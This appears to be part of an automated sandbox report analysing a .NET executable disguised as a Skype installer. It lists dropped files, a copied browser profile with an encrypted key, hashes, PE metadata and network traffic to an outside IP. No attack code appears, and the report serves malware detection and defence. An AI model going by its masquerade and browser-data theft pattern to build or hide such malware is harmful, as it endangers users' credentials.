                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      Time | Type | Description
                      12:21:38 | API Interceptor | 1x Sleep call for process: hesaphareketi-01.exe modified

                      Joe Sandbox View / Context

                      IPs


                                                                  Domains


                                                                  ASN


                                                                  JA3 Fingerprints


                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):847
                                                                  Entropy (8bit):5.35816127824051
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                  MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                  SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                  SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                  SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                  C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):4.917728901780082
                                                                  Encrypted:false
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd
                                                                  MD5:38E162610466DD251D9B377A60F65C11
                                                                  SHA1:2A597D5198230EAAFE8D842E76776192BA3E6742
                                                                  SHA-256:7EB784EDDDDE0EDDD7B21C4907916F0109334A4237A9C2EB917CAF8EAE81480F
                                                                  SHA-512:385A3A4D1592539E64A14A096AB50F86925376CCA6CD23DCE1F88CF636AFFCE84CD16C8716B68889BC10CB514822ADC26BC2AEC4CD6B6200FBBEE611740994BC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 31%, Browse
                                                                  Reputation:low
                                                                  C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Users\user\AppData\Roaming\.BjejAh.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):349054
                                                                  Entropy (8bit):6.015923338738634
                                                                  Encrypted:false
                                                                  SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                  MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                  SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                  SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                  SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):4.917728901780082
                                                                  Encrypted:false
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd
                                                                  MD5:38E162610466DD251D9B377A60F65C11
                                                                  SHA1:2A597D5198230EAAFE8D842E76776192BA3E6742
                                                                  SHA-256:7EB784EDDDDE0EDDD7B21C4907916F0109334A4237A9C2EB917CAF8EAE81480F
                                                                  SHA-512:385A3A4D1592539E64A14A096AB50F86925376CCA6CD23DCE1F88CF636AFFCE84CD16C8716B68889BC10CB514822ADC26BC2AEC4CD6B6200FBBEE611740994BC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Users\user\AppData\Roaming\tF.a..z.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.792852251086831
                                                                  Encrypted:false
                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                  Malicious:false

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):4.917728901780082
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:hesaphareketi-01.exe
                                                                  File size:33792
                                                                  MD5:38e162610466dd251d9b377a60f65c11
                                                                  SHA1:2a597d5198230eaafe8d842e76776192ba3e6742
                                                                  SHA256:7eb784edddde0eddd7b21c4907916f0109334a4237a9c2eb917caf8eae81480f
                                                                  SHA512:385a3a4d1592539e64a14a096ab50f86925376cca6cd23dce1f88cf636affce84cd16c8716b68889bc10cb514822adc26bc2aec4cd6b6200fbbee611740994bc
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd

                                                                  File Icon

                                                                  Icon Hash:92b6928a868a82a4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4055be
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x8A1682B9 [Mon Jun 1 00:24:25 2043 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x5570           0x4b          .text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6000           0x48e8        .rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc000           0xc           .reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                  Sections

                                                                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                                  .text   0x2000           0x35c4        0x3600    False     0.603226273148   data       6.03656703165    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc   0x6000           0x48e8        0x4a00    False     0.221125422297   data       3.25573716149    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc  0xc000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  Name           RVA     Size    Type                                                                                                                                       Language  Country
                                                                  RT_ICON        0x6130  0x4228  dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_GROUP_ICON  0xa358  0x14    data
                                                                  RT_VERSION     0xa36c  0x390   data
                                                                  RT_MANIFEST    0xa6fc  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLL          Import
                                                                  mscoree.dll  _CorExeMain

                                                                  Version Infos

                                                                  Description       Data
                                                                  Translation       0x0000 0x04b0
                                                                  LegalCopyright    (c) 2021 Skype and/or Microsoft
                                                                  Assembly Version  8.77.0.97
                                                                  InternalName      ConsoleApp19.exe
                                                                  FileVersion       8.77.0.97
                                                                  CompanyName       Skype Technologies S.A.
                                                                  LegalTrademarks
                                                                  Comments          Skype Setup
                                                                  ProductName       Skype
                                                                  ProductVersion    8.77.0.97
                                                                  FileDescription   Skype Setup
                                                                  OriginalFilename  ConsoleApp19.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  Timestamp                 Protocol  SID  Message                                                       Source Port  Dest Port  Source IP  Dest IP
                                                                  10/14/21-12:21:41.240968  UDP       254  DNS SPOOF query response with TTL of 1 min. and no authority  53           60075      8.8.8.8    192.168.2.5

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                  Oct 14, 2021 12:20:58.336791039 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336813927 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336879969 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.336899996 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.336915970 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337065935 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337086916 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337096930 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337110996 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.337121964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337152958 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337382078 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.337543964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362500906 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362540007 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362637043 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362692118 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362708092 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362739086 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362792015 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362854958 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362894058 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362936974 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.362982035 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.362993956 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363030910 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363068104 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363142014 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363173962 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363225937 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363239050 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363286018 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363327980 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363379955 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363415003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363468885 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363482952 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363518000 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363554955 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363629103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363658905 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363699913 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363750935 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363759995 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363833904 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363881111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363909960 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.363960981 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.363970041 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364025116 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364116907 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364144087 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364192963 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364204884 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364243984 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364275932 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364367008 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364398003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364447117 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364456892 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364500999 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364542007 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364573956 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364604950 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364649057 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364655018 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364713907 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364820957 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364864111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364898920 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364909887 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.364947081 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.364978075 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.365401030 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.417768002 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.417804003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.417896032 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418020964 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418057919 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418078899 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418087006 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418102026 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418178082 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418188095 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418203115 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418239117 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418375969 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418386936 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418401003 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418447018 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418550968 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418560982 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418575048 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418595076 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418709040 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.418718100 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.418879032 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.419720888 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.420352936 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443557978 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443614006 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443703890 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443764925 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443789959 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443833113 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443851948 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443861961 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443897009 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443903923 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443931103 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443934917 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443972111 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.443979979 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.443990946 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444010973 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444020033 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444063902 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444071054 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444094896 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444108963 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444113970 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444125891 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444147110 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444180965 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444202900 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444209099 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444220066 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444236040 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444264889 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444278002 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444283009 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444294930 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444320917 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444344044 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444348097 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444449902 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444497108 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444528103 CEST4434976231.14.69.10192.168.2.5
